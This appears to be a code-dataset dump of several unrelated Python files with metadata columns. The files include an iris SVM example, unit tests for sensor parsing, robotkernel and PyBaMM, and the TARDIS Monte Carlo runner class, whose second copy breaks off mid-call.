index = np.arange(len(label))
plt.bar(index, results)
plt.xticks(index, label, fontsize=20, rotation=30)
plt.show()
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn import svm
from sklearn.metrics import accuracy_score
from matplotlib import pyplot as plt
#from sklearn import cross_validation
# get the data
iris = load_iris()
data0 = iris.data
labels0 = iris.target
(n,p) = data0.shape
#train test split.
xtrain,xtest,ytrain,ytest = train_test_split(data0,labels0,test_size=0.3, random_state=21)
# rbf kernel.
rbfn = svm.SVC(C=10,kernel='rbf',gamma=0.001)
rbfn.fit(xtrain,ytrain)
pred_rbf=rbfn.predict(xtest)
acc_rbf = accuracy_score(ytest, pred_rbf)
print("Accuracy Score of Kernel=rbf is ",acc_rbf)
# poly kernel
quad = svm.SVC(C=10.0,kernel='poly',degree=2,gamma='auto')
quad.fit(xtrain,ytrain)
pred_quad=quad.predict(xtest)
acc_quad=accuracy_score(ytest,pred_quad)
print("Accuracy Score of Kernel=poly is ",acc_quad)
# sigmoid kernel
sigm = svm.SVC(C=10.0, kernel='sigmoid', gamma=0.001)
sigm.fit(xtrain, ytrain)
pred_sigmoid = sigm.predict(xtest)
acc_sigmoid = accuracy_score(ytest, pred_sigmoid)
print("Accuracy Score of Kernel=sigmoid is ",acc_sigmoid)
#plotting graph
results = []
results.append(accuracy_score(ytest, pred_rbf))
results.append(accuracy_score(ytest, pred_quad))
results.append(accuracy_score(ytest, pred_sigmoid))
label = ['rbf','quad','sigmoid']
index = np.arange(len(label))
plt.bar(index, results)
plt.xticks(index, label, fontsize=20, rotation=30)
plt.show()
|
en
| 0.567882
|
# -*- coding: utf-8 -*- Spyder Editor
This is a temporary script file. #from sklearn import cross_validation # get the data #train test split. # rbf kernel. # poly kernel # sigmoid kernel #plotting graph
| 2.830404
| 3
|
test/test_whwreader.py
|
mtwharmby/whweather-reader
| 0
|
6628144
|
import pytest
import whwreader.whwreader as whwreader
from whwreader.whwreader import Reading
def test_transform():
#Preamble
whwreader.__sensor_time_offset['boris'] = 0
whwreader.__sensor_time_offset['charles'] = 1546804623.6360931
sensor_reading = "name=boris::time=2134457::temp=25.5::humid=56.8"
#expected = Reading('boris', 2134.457, readings={'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
expected = Reading('boris', 2134.457, {'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
structured_read = whwreader.transform_reading(sensor_reading)
assert structured_read == expected
#Now test against an offset time. N.B. Expecting time in ms
sensor_reading_2 = "name=charles::time=600::temp=32.5::humid=22.6"
expected_2 = Reading('charles', 1546804623.6360931 + 0.6, readings={'temp': 32.5, 'humid': 22.6})
structured_read = whwreader.transform_reading(sensor_reading_2)
assert structured_read == expected_2
|
import pytest
import whwreader.whwreader as whwreader
from whwreader.whwreader import Reading
def test_transform():
#Preamble
whwreader.__sensor_time_offset['boris'] = 0
whwreader.__sensor_time_offset['charles'] = 1546804623.6360931
sensor_reading = "name=boris::time=2134457::temp=25.5::humid=56.8"
#expected = Reading('boris', 2134.457, readings={'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
expected = Reading('boris', 2134.457, {'temp': 25.5, 'humid': 56.8}, sensor_unknown=False)
structured_read = whwreader.transform_reading(sensor_reading)
assert structured_read == expected
#Now test against an offset time. N.B. Expecting time in ms
sensor_reading_2 = "name=charles::time=600::temp=32.5::humid=22.6"
expected_2 = Reading('charles', 1546804623.6360931 + 0.6, readings={'temp': 32.5, 'humid': 22.6})
structured_read = whwreader.transform_reading(sensor_reading_2)
assert structured_read == expected_2
|
en
| 0.656804
|
#Preamble #expected = Reading('boris', 2134.457, readings={'temp': 25.5, 'humid': 56.8}, sensor_unknown=False) #Now test against an offset time. N.B. Expecting time in ms
| 2.411141
| 2
|
SimPEG/potential_fields/__init__.py
|
Prithwijit-Chak/simpeg
| 358
|
6628145
|
from __future__ import absolute_import
from . import magnetics
from . import gravity
from .base import get_dist_wgt
|
from __future__ import absolute_import
from . import magnetics
from . import gravity
from .base import get_dist_wgt
|
none
| 1
| 1.104267
| 1
|
|
tests/test_builders.py
|
martinRenou/robotkernel
| 56
|
6628146
|
# -*- coding: utf-8 -*-
from robotkernel.builders import build_suite
TEST_SUITE = """\
*** Settings ***
Library Collections
*** Keywords ***
Head
[Arguments] ${list}
${value}= Get from list ${list} 0
[Return] ${value}
*** Tasks ***
Get head
${array}= Create list 1 2 3 4 5
${head}= Head ${array}
Should be equal ${head} 1
"""
def test_string():
suite = build_suite(TEST_SUITE, {})
assert len(suite.resource.keywords) == 1
assert len(suite.tests) == 1
|
# -*- coding: utf-8 -*-
from robotkernel.builders import build_suite
TEST_SUITE = """\
*** Settings ***
Library Collections
*** Keywords ***
Head
[Arguments] ${list}
${value}= Get from list ${list} 0
[Return] ${value}
*** Tasks ***
Get head
${array}= Create list 1 2 3 4 5
${head}= Head ${array}
Should be equal ${head} 1
"""
def test_string():
suite = build_suite(TEST_SUITE, {})
assert len(suite.resource.keywords) == 1
assert len(suite.tests) == 1
|
en
| 0.589127
|
# -*- coding: utf-8 -*- \ *** Settings *** Library Collections *** Keywords *** Head [Arguments] ${list} ${value}= Get from list ${list} 0 [Return] ${value} *** Tasks *** Get head ${array}= Create list 1 2 3 4 5 ${head}= Head ${array} Should be equal ${head} 1
| 2.486232
| 2
|
masterfile/_metadata.py
|
uwmadison-chm/masterfile
| 0
|
6628147
|
# -*- coding: utf-8 -*-
# flake8: noqa: E501
from __future__ import absolute_import, unicode_literals
author = '<NAME>'
email = '<EMAIL>'
version = '0.6.0'
license = 'MIT license'
copyright = 'Copyright (c) 2020 Board of Regents of the University of Wisconsin System'
url = 'https://github.com/uwmadison-chm/masterfile'
|
# -*- coding: utf-8 -*-
# flake8: noqa: E501
from __future__ import absolute_import, unicode_literals
author = '<NAME>'
email = '<EMAIL>'
version = '0.6.0'
license = 'MIT license'
copyright = 'Copyright (c) 2020 Board of Regents of the University of Wisconsin System'
url = 'https://github.com/uwmadison-chm/masterfile'
|
en
| 0.53967
|
# -*- coding: utf-8 -*- # flake8: noqa: E501
| 1.028662
| 1
|
tests/unit/test_batch_study.py
|
manjunathnilugal/PyBaMM
| 330
|
6628148
|
"""
Tests for the batch_study.py
"""
import os
import pybamm
import unittest
spm = pybamm.lithium_ion.SPM()
spm_uniform = pybamm.lithium_ion.SPM({"particle": "uniform profile"})
casadi_safe = pybamm.CasadiSolver(mode="safe")
casadi_fast = pybamm.CasadiSolver(mode="fast")
exp1 = pybamm.Experiment([("Discharge at C/5 for 10 minutes", "Rest for 1 hour")])
exp2 = pybamm.Experiment([("Discharge at C/20 for 10 minutes", "Rest for 1 hour")])
bs_false_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}
)
bs_true_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, permutations=True
)
bs_false = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp1": exp1, "exp2": exp2},
)
bs_true = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp2": exp2},
permutations=True,
)
class TestBatchStudy(unittest.TestCase):
def test_solve(self):
# Tests for exceptions
for name in pybamm.BatchStudy.INPUT_LIST:
with self.assertRaises(ValueError):
pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, **{name: {None}}
)
# Tests for None when only models are given with permutations=False
bs_false_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_false_only_models.sims))
# Tests for None when only models are given with permutations=True
bs_true_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_true_only_models.sims))
# Tests for BatchStudy when permutations=False
bs_false.solve()
bs_false.plot(testing=True)
self.assertEqual(2, len(bs_false.sims))
for num in range(len(bs_false.sims)):
output_model = bs_false.sims[num].model.name
models_list = [model.name for model in bs_false.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_false.sims[num].solver.name
solvers_list = [solver.name for solver in bs_false.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_false.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_false.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
# Tests for BatchStudy when permutations=True
bs_true.solve()
bs_true.plot(testing=True)
self.assertEqual(4, len(bs_true.sims))
for num in range(len(bs_true.sims)):
output_model = bs_true.sims[num].model.name
models_list = [model.name for model in bs_true.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_true.sims[num].solver.name
solvers_list = [solver.name for solver in bs_true.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_true.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_true.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
def test_create_gif(self):
bs = pybamm.BatchStudy({"spm": pybamm.lithium_ion.SPM()})
bs.solve([0, 10])
# create a GIF before calling the plot method
bs.create_gif(number_of_images=3, duration=1)
# create a GIF after calling the plot method
bs.plot(testing=True)
bs.create_gif(number_of_images=3, duration=1)
os.remove("plot.gif")
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
"""
Tests for the batch_study.py
"""
import os
import pybamm
import unittest
spm = pybamm.lithium_ion.SPM()
spm_uniform = pybamm.lithium_ion.SPM({"particle": "uniform profile"})
casadi_safe = pybamm.CasadiSolver(mode="safe")
casadi_fast = pybamm.CasadiSolver(mode="fast")
exp1 = pybamm.Experiment([("Discharge at C/5 for 10 minutes", "Rest for 1 hour")])
exp2 = pybamm.Experiment([("Discharge at C/20 for 10 minutes", "Rest for 1 hour")])
bs_false_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}
)
bs_true_only_models = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, permutations=True
)
bs_false = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp1": exp1, "exp2": exp2},
)
bs_true = pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform},
solvers={"casadi safe": casadi_safe, "casadi fast": casadi_fast},
experiments={"exp2": exp2},
permutations=True,
)
class TestBatchStudy(unittest.TestCase):
def test_solve(self):
# Tests for exceptions
for name in pybamm.BatchStudy.INPUT_LIST:
with self.assertRaises(ValueError):
pybamm.BatchStudy(
models={"SPM": spm, "SPM uniform": spm_uniform}, **{name: {None}}
)
# Tests for None when only models are given with permutations=False
bs_false_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_false_only_models.sims))
# Tests for None when only models are given with permutations=True
bs_true_only_models.solve(t_eval=[0, 3600])
self.assertEqual(2, len(bs_true_only_models.sims))
# Tests for BatchStudy when permutations=False
bs_false.solve()
bs_false.plot(testing=True)
self.assertEqual(2, len(bs_false.sims))
for num in range(len(bs_false.sims)):
output_model = bs_false.sims[num].model.name
models_list = [model.name for model in bs_false.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_false.sims[num].solver.name
solvers_list = [solver.name for solver in bs_false.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_false.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_false.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
# Tests for BatchStudy when permutations=True
bs_true.solve()
bs_true.plot(testing=True)
self.assertEqual(4, len(bs_true.sims))
for num in range(len(bs_true.sims)):
output_model = bs_true.sims[num].model.name
models_list = [model.name for model in bs_true.models.values()]
self.assertIn(output_model, models_list)
output_solver = bs_true.sims[num].solver.name
solvers_list = [solver.name for solver in bs_true.solvers.values()]
self.assertIn(output_solver, solvers_list)
output_experiment = bs_true.sims[
num
].experiment.operating_conditions_strings
experiments_list = [
experiment.operating_conditions_strings
for experiment in bs_true.experiments.values()
]
self.assertIn(output_experiment, experiments_list)
def test_create_gif(self):
bs = pybamm.BatchStudy({"spm": pybamm.lithium_ion.SPM()})
bs.solve([0, 10])
# create a GIF before calling the plot method
bs.create_gif(number_of_images=3, duration=1)
# create a GIF after calling the plot method
bs.plot(testing=True)
bs.create_gif(number_of_images=3, duration=1)
os.remove("plot.gif")
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
en
| 0.818742
|
Tests for the batch_study.py # Tests for exceptions # Tests for None when only models are given with permutations=False # Tests for None when only models are given with permutations=True # Tests for BatchStudy when permutations=False # Tests for BatchStudy when permutations=True # create a GIF before calling the plot method # create a GIF after calling the plot method
| 2.427339
| 2
|
tardis/montecarlo/base.py
|
nileshpatra/tardis
| 0
|
6628149
|
import os
import logging
import warnings
from astropy import units as u
from tardis import constants as const
from scipy.special import zeta
from tardis.montecarlo.spectrum import TARDISSpectrum
from tardis.util.base import quantity_linspace
from tardis.io.util import HDFWriterMixin
from tardis.montecarlo import montecarlo, packet_source
from tardis.montecarlo.formal_integral import FormalIntegrator
import numpy as np
logger = logging.getLogger(__name__)
class MontecarloRunner(HDFWriterMixin):
"""
This class is designed as an interface between the Python part and the
montecarlo C-part
"""
hdf_properties = ['output_nu', 'output_energy', 'nu_bar_estimator',
'j_estimator', 'montecarlo_virtual_luminosity',
'last_interaction_in_nu',
'last_interaction_type',
'last_line_interaction_in_id',
'last_line_interaction_out_id',
'last_line_interaction_shell_id',
'packet_luminosity', 'spectrum',
'spectrum_virtual', 'spectrum_reabsorbed']
hdf_name = 'runner'
w_estimator_constant = ((const.c ** 2 / (2 * const.h)) *
(15 / np.pi ** 4) * (const.h / const.k_B) ** 4 /
(4 * np.pi)).cgs.value
t_rad_estimator_constant = ((np.pi**4 / (15 * 24 * zeta(5, 1))) *
(const.h / const.k_B)).cgs.value
def __init__(self, seed, spectrum_frequency, virtual_spectrum_range,
sigma_thomson, enable_reflective_inner_boundary,
enable_full_relativity, inner_boundary_albedo,
line_interaction_type, integrator_settings,
v_packet_settings):
self.seed = seed
self.packet_source = packet_source.BlackBodySimpleSource(seed)
self.spectrum_frequency = spectrum_frequency
self.virtual_spectrum_range = virtual_spectrum_range
self.sigma_thomson = sigma_thomson
self.enable_reflective_inner_boundary = enable_reflective_inner_boundary
self.inner_boundary_albedo = inner_boundary_albedo
self.enable_full_relativity = enable_full_relativity
self.line_interaction_type = line_interaction_type
self.integrator_settings = integrator_settings
self.v_packet_settings = v_packet_settings
self._integrator = None
self._spectrum_integrated = None
def _initialize_estimator_arrays(self, no_of_shells, tau_sobolev_shape):
"""
Initialize the output arrays of the montecarlo simulation.
Parameters
----------
model: ~Radial1DModel
"""
# Estimators
self.j_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.nu_bar_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.j_blue_estimator = np.zeros(tau_sobolev_shape)
self.Edotlu_estimator = np.zeros(tau_sobolev_shape)
def _initialize_geometry_arrays(self, model):
"""
Generate the cgs like geometry arrays for the montecarlo part
Parameters
----------
model : model.Radial1DModel
"""
self.r_inner_cgs = model.r_inner.to('cm').value
self.r_outer_cgs = model.r_outer.to('cm').value
self.v_inner_cgs = model.v_inner.to('cm/s').value
def _initialize_packets(self, T, no_of_packets):
nus, mus, energies = self.packet_source.create_packets(
T,
no_of_packets
)
self.input_nu = nus
self.input_mu = mus
self.input_energy = energies
self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0
self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0
self.last_line_interaction_in_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_line_interaction_out_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_line_interaction_shell_id = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_interaction_type = -1 * np.ones(
no_of_packets, dtype=np.int64)
self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64)
self._montecarlo_virtual_luminosity = u.Quantity(
np.zeros_like(self.spectrum_frequency.value),
'erg / s'
)
@property
def spectrum(self):
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_emitted_luminosity)
@property
def spectrum_reabsorbed(self):
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_reabsorbed_luminosity)
@property
def spectrum_virtual(self):
if np.all(self.montecarlo_virtual_luminosity == 0):
warnings.warn(
"MontecarloRunner.spectrum_virtual"
"is zero. Please run the montecarlo simulation with"
"no_of_virtual_packets > 0", UserWarning)
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_virtual_luminosity)
@property
def spectrum_integrated(self):
if self._spectrum_integrated is None:
self._spectrum_integrated = self.integrator.calculate_spectrum(
self.spectrum_frequency[:-1], **self.integrator_settings)
return self._spectrum_integrated
@property
def integrator(self):
if self._integrator is None:
warnings.warn(
"MontecarloRunner.integrator: "
"The FormalIntegrator is not yet available."
"Please run the montecarlo simulation at least once.",
UserWarning)
if self.enable_full_relativity:
raise NotImplementedError(
"The FormalIntegrator is not yet implemented for the full "
"relativity mode. "
"Please run with config option enable_full_relativity: "
"False."
)
return self._integrator
def run(self, model, plasma, no_of_packets,
no_of_virtual_packets=0, nthreads=1,
last_run=False):
"""
Run the montecarlo calculation
Parameters
----------
model : tardis.model.Radial1DModel
plasma : tardis.plasma.BasePlasma
no_of_packets : int
no_of_virtual_packets : int
nthreads : int
last_run : bool
Returns
-------
None
"""
self._integrator = FormalIntegrator(
model,
plasma,
self)
self.time_of_simulation = self.calculate_time_of_simulation(model)
self.volume = model.volume
self._initialize_estimator_arrays(self.volume.shape[0],
plasma.tau_sobolevs.shape)
self._initialize_geometry_arrays(model)
self._initialize_packets(model.t_inner.value,
no_of_packets)
montecarlo.montecarlo_radial1d(
model, plasma, self,
virtual_packet_flag=no_of_virtual_packets,
nthreads=nthreads,
last_run=last_run)
# Workaround so that j_blue_estimator is in the right ordering
# They are written as an array of dimension (no_of_shells, no_of_lines)
# but python expects (no_of_lines, no_of_shells)
self.j_blue_estimator = np.ascontiguousarray(
self.j_blue_estimator.flatten().reshape(
self.j_blue_estimator.shape, order='F')
)
self.Edotlu_estimator = np.ascontiguousarray(
self.Edotlu_estimator.flatten().reshape(
self.Edotlu_estimator.shape, order='F')
)
def legacy_return(self):
return (self.output_nu, self.output_energy,
self.j_estimator, self.nu_bar_estimator,
self.last_line_interaction_in_id,
self.last_line_interaction_out_id,
self.last_interaction_type,
self.last_line_interaction_shell_id)
def get_line_interaction_id(self, line_interaction_type):
return ['scatter', 'downbranch', 'macroatom'].index(
line_interaction_type)
@property
def output_nu(self):
return u.Quantity(self._output_nu, u.Hz)
@property
def output_energy(self):
return u.Quantity(self._output_energy, u.erg)
@property
def virtual_packet_nu(self):
try:
return u.Quantity(self.virt_packet_nus, u.Hz)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_nu:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_energy(self):
try:
return u.Quantity(self.virt_packet_energies, u.erg)
except AttributeError:
warnings.warn(
"MontecarloRunner.virtual_packet_energy:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def virtual_packet_luminosity(self):
try:
return self.virtual_packet_energy / self.time_of_simulation
except TypeError:
warnings.warn(
"MontecarloRunner.virtual_packet_luminosity:"
"compile with --with-vpacket-logging"
"to access this property", UserWarning)
return None
@property
def packet_luminosity(self):
return self.output_energy / self.time_of_simulation
@property
def emitted_packet_mask(self):
return self.output_energy >= 0
@property
def emitted_packet_nu(self):
return self.output_nu[self.emitted_packet_mask]
@property
def reabsorbed_packet_nu(self):
return self.output_nu[~self.emitted_packet_mask]
@property
def emitted_packet_luminosity(self):
return self.packet_luminosity[self.emitted_packet_mask]
@property
def reabsorbed_packet_luminosity(self):
return -self.packet_luminosity[~self.emitted_packet_mask]
@property
def montecarlo_reabsorbed_luminosity(self):
return u.Quantity(
np.histogram(
self.reabsorbed_packet_nu,
weights=self.reabsorbed_packet_luminosity,
bins=self.spectrum_frequency.value)[0],
'erg / s'
)
@property
def montecarlo_emitted_luminosity(self):
return u.Quantity(
np.histogram(
self.emitted_packet_nu,
weights=self.emitted_packet_luminosity,
bins=self.spectrum_frequency.value)[0],
'erg / s'
)
@property
def montecarlo_virtual_luminosity(self):
return (
self._montecarlo_virtual_luminosity[:-1] /
self.time_of_simulation.value)
def calculate_emitted_luminosity(self, luminosity_nu_start,
luminosity_nu_end):
luminosity_wavelength_filter = (
(self.emitted_packet_nu > luminosity_nu_start) &
(self.emitted_packet_nu < luminosity_nu_end))
emitted_luminosity = self.emitted_packet_luminosity[
luminosity_wavelength_filter].sum()
return emitted_luminosity
def calculate_reabsorbed_luminosity(
self, luminosity_nu_start,
luminosity_nu_end):
luminosity_wavelength_filter = (
(self.reabsorbed_packet_nu > luminosity_nu_start) &
(self.reabsorbed_packet_nu < luminosity_nu_end))
reabsorbed_luminosity = self.reabsorbed_packet_luminosity[
luminosity_wavelength_filter].sum()
return reabsorbed_luminosity
def calculate_radiationfield_properties(self):
"""
Calculate an updated radiation field from the :math:
`\\bar{nu}_\\textrm{estimator}` and :math:`\\J_\\textrm{estimator}`
calculated in the montecarlo simulation.
The details of the calculation can be found in the documentation.
Parameters
----------
nubar_estimator : ~np.ndarray (float)
j_estimator : ~np.ndarray (float)
Returns
-------
t_rad : ~astropy.units.Quantity (float)
w : ~numpy.ndarray (float)
"""
t_rad = (
self.t_rad_estimator_constant *
self.nu_bar_estimator /
self.j_estimator)
w = self.j_estimator / (
4 * const.sigma_sb.cgs.value * t_rad ** 4 *
self.time_of_simulation.value *
self.volume.value)
return t_rad * u.K, w
    def calculate_luminosity_inner(self, model):
        # Blackbody luminosity of the inner boundary:
        # L = 4 * pi * sigma_sb * r_inner^2 * T_inner^4
        return (4 * np.pi * const.sigma_sb.cgs *
                model.r_inner[0] ** 2 * model.t_inner ** 4).to('erg/s')
    def calculate_time_of_simulation(self, model):
        # Simulation time normalised so the total packet energy is 1 erg.
        return (1.0 * u.erg / self.calculate_luminosity_inner(model))
    def calculate_f_nu(self, frequency):
        # Not implemented; placeholder kept for interface compatibility.
        pass
    def calculate_f_lambda(self, wavelength):
        # Not implemented; placeholder kept for interface compatibility.
        pass
@classmethod
def from_config(cls, config):
"""
Create a new MontecarloRunner instance from a Configuration object.
Parameters
----------
config : tardis.io.config_reader.Configuration
Returns
-------
MontecarloRunner
"""
if config.plasma.disable_electron_scattering:
logger.warn('Disabling electron scattering - this is not physical')
sigma_thomson = 1e-200 * (u.cm ** 2)
else:
logger.debug("Electron scattering switched on")
sigma_thomson = const.sigma_T.cgs
spectrum_frequency = quantity_linspace(
config.spectrum.stop.to('Hz', u.spectral()),
config.spectrum.start.to('Hz', u.spectral()),
num=config.spectrum.num + 1)
return cls(seed=config.montecarlo.seed,
spectrum_frequency=spectrum_frequency,
virtual_spectrum_range=config.montecarlo.virtual_spectrum_range,
sigma_thomson=sigma_thomson,
enable_reflective_inner_boundary=config.montecarlo.enable_reflective_inner_boundary,
inner_boundary_albedo=config.montecarlo.inner_boundary_albedo,
enable_full_relativity=config.montecarlo.enable_full_relativity,
line_interaction_type=config.plasma.line_interaction_type,
integrator_settings=config.spectrum.integrated,
v_packet_settings=config.spectrum.virtual)
|
import os
import logging
import warnings
from astropy import units as u
from tardis import constants as const
from scipy.special import zeta
from tardis.montecarlo.spectrum import TARDISSpectrum
from tardis.util.base import quantity_linspace
from tardis.io.util import HDFWriterMixin
from tardis.montecarlo import montecarlo, packet_source
from tardis.montecarlo.formal_integral import FormalIntegrator
import numpy as np
logger = logging.getLogger(__name__)
class MontecarloRunner(HDFWriterMixin):
    """
    This class is designed as an interface between the Python part and the
    montecarlo C-part
    """
    # Attributes/properties persisted to HDF by HDFWriterMixin
    hdf_properties = ['output_nu', 'output_energy', 'nu_bar_estimator',
                      'j_estimator', 'montecarlo_virtual_luminosity',
                      'last_interaction_in_nu',
                      'last_interaction_type',
                      'last_line_interaction_in_id',
                      'last_line_interaction_out_id',
                      'last_line_interaction_shell_id',
                      'packet_luminosity', 'spectrum',
                      'spectrum_virtual', 'spectrum_reabsorbed']
    hdf_name = 'runner'
    # cgs prefactor used in the dilution-factor (w) estimation
    w_estimator_constant = ((const.c ** 2 / (2 * const.h)) *
                            (15 / np.pi ** 4) * (const.h / const.k_B) ** 4 /
                            (4 * np.pi)).cgs.value
    # cgs prefactor relating the nu_bar/J estimators to the radiation
    # temperature (see calculate_radiationfield_properties)
    t_rad_estimator_constant = ((np.pi**4 / (15 * 24 * zeta(5, 1))) *
                                (const.h / const.k_B)).cgs.value
    def __init__(self, seed, spectrum_frequency, virtual_spectrum_range,
                 sigma_thomson, enable_reflective_inner_boundary,
                 enable_full_relativity, inner_boundary_albedo,
                 line_interaction_type, integrator_settings,
                 v_packet_settings):
        self.seed = seed
        # Packet source seeded here for reproducible packet populations
        self.packet_source = packet_source.BlackBodySimpleSource(seed)
        self.spectrum_frequency = spectrum_frequency
        self.virtual_spectrum_range = virtual_spectrum_range
        self.sigma_thomson = sigma_thomson
        self.enable_reflective_inner_boundary = enable_reflective_inner_boundary
        self.inner_boundary_albedo = inner_boundary_albedo
        self.enable_full_relativity = enable_full_relativity
        self.line_interaction_type = line_interaction_type
        self.integrator_settings = integrator_settings
        self.v_packet_settings = v_packet_settings
        # Populated lazily by run() / spectrum_integrated
        self._integrator = None
        self._spectrum_integrated = None
def _initialize_estimator_arrays(self, no_of_shells, tau_sobolev_shape):
"""
Initialize the output arrays of the montecarlo simulation.
Parameters
----------
model: ~Radial1DModel
"""
# Estimators
self.j_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.nu_bar_estimator = np.zeros(no_of_shells, dtype=np.float64)
self.j_blue_estimator = np.zeros(tau_sobolev_shape)
self.Edotlu_estimator = np.zeros(tau_sobolev_shape)
def _initialize_geometry_arrays(self, model):
"""
Generate the cgs like geometry arrays for the montecarlo part
Parameters
----------
model : model.Radial1DModel
"""
self.r_inner_cgs = model.r_inner.to('cm').value
self.r_outer_cgs = model.r_outer.to('cm').value
self.v_inner_cgs = model.v_inner.to('cm/s').value
    def _initialize_packets(self, T, no_of_packets):
        """
        Draw the initial packet population from the blackbody packet source
        and reset all per-packet output/bookkeeping arrays.

        Parameters
        ----------
        T : float
            Temperature passed to the packet source.
        no_of_packets : int
        """
        nus, mus, energies = self.packet_source.create_packets(
            T,
            no_of_packets
        )
        self.input_nu = nus
        self.input_mu = mus
        self.input_energy = energies
        # -99.0 marks packets not yet processed by the montecarlo C loop
        self._output_nu = np.ones(no_of_packets, dtype=np.float64) * -99.0
        self._output_energy = np.ones(no_of_packets, dtype=np.float64) * -99.0
        # -1 marks "no interaction recorded" in the id/type trackers
        self.last_line_interaction_in_id = -1 * np.ones(
            no_of_packets, dtype=np.int64)
        self.last_line_interaction_out_id = -1 * np.ones(
            no_of_packets, dtype=np.int64)
        self.last_line_interaction_shell_id = -1 * np.ones(
            no_of_packets, dtype=np.int64)
        self.last_interaction_type = -1 * np.ones(
            no_of_packets, dtype=np.int64)
        self.last_interaction_in_nu = np.zeros(no_of_packets, dtype=np.float64)
        # Accumulator for the virtual-packet spectrum, filled by the C part
        self._montecarlo_virtual_luminosity = u.Quantity(
            np.zeros_like(self.spectrum_frequency.value),
            'erg / s'
        )
    @property
    def spectrum(self):
        # Spectrum built from real (emitted) packets
        return TARDISSpectrum(
            self.spectrum_frequency,
            self.montecarlo_emitted_luminosity)
    @property
    def spectrum_reabsorbed(self):
        # Spectrum of packets reabsorbed by the ejecta
        return TARDISSpectrum(
            self.spectrum_frequency,
            self.montecarlo_reabsorbed_luminosity)
@property
def spectrum_virtual(self):
if np.all(self.montecarlo_virtual_luminosity == 0):
warnings.warn(
"MontecarloRunner.spectrum_virtual"
"is zero. Please run the montecarlo simulation with"
"no_of_virtual_packets > 0", UserWarning)
return TARDISSpectrum(
self.spectrum_frequency,
self.montecarlo_virtual_luminosity)
    @property
    def spectrum_integrated(self):
        # Computed lazily on first access via the formal integral;
        # requires run() to have been called (which sets self._integrator).
        if self._spectrum_integrated is None:
            self._spectrum_integrated = self.integrator.calculate_spectrum(
                self.spectrum_frequency[:-1], **self.integrator_settings)
        return self._spectrum_integrated
@property
def integrator(self):
if self._integrator is None:
warnings.warn(
"MontecarloRunner.integrator: "
"The FormalIntegrator is not yet available."
"Please run the montecarlo simulation at least once.",
UserWarning)
if self.enable_full_relativity:
raise NotImplementedError(
"The FormalIntegrator is not yet implemented for the full "
"relativity mode. "
"Please run with config option enable_full_relativity: "
"False."
)
return self._integrator
    def run(self, model, plasma, no_of_packets,
            no_of_virtual_packets=0, nthreads=1,
            last_run=False):
        """
        Run the montecarlo calculation

        Parameters
        ----------
        model : tardis.model.Radial1DModel
        plasma : tardis.plasma.BasePlasma
        no_of_packets : int
        no_of_virtual_packets : int
        nthreads : int
        last_run : bool

        Returns
        -------
        None
        """
        self._integrator = FormalIntegrator(
            model,
            plasma,
            self)
        # Time normalisation such that the total packet energy is 1 erg
        self.time_of_simulation = self.calculate_time_of_simulation(model)
        self.volume = model.volume
        self._initialize_estimator_arrays(self.volume.shape[0],
                                          plasma.tau_sobolevs.shape)
        self._initialize_geometry_arrays(model)
        self._initialize_packets(model.t_inner.value,
                                 no_of_packets)
        # Hand off to the C implementation, which fills the output and
        # estimator arrays in place
        montecarlo.montecarlo_radial1d(
            model, plasma, self,
